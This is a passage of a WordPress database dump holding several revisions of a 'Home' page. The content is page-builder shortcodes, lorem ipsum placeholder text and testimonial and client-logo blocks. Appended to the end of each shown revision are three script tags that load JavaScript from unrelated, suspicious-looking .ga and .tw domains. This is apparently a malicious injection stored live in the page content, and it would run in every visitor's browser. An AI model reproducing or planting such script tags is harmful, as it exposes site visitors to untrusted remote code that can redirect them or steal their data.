Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-29 16:37:03','2018-01-29 16:37:03','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6673,1,'2018-01-29 16:37:34','2018-01-29 16:37:34','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#d0d7dd\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color=\"#ff3a6f\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517243816062{margin-bottom: 10px !important;}\"]\r\n<h5>Call Us : 12345</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-29 16:37:34','2018-01-29 16:37:34','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0);
INSERT INTO `wm_posts` VALUES (6674,1,'2018-01-29 16:38:59','2018-01-29 16:38:59','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#d0d7dd\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color=\"#ff3a6f\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517243938135{margin-bottom: 10px !important;}\"]\r\n<h4>Call Us : 12345</h4>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517243816062{margin-bottom: 10px !important;}\"]\r\n<h5>Call Us : 12345</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517243816062{margin-bottom: 10px !important;}\"]\r\n<h5>Call Us : 12345</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-29 16:38:59','2018-01-29 16:38:59','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6675,1,'2018-01-30 00:36:37','2018-01-30 00:36:37','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" 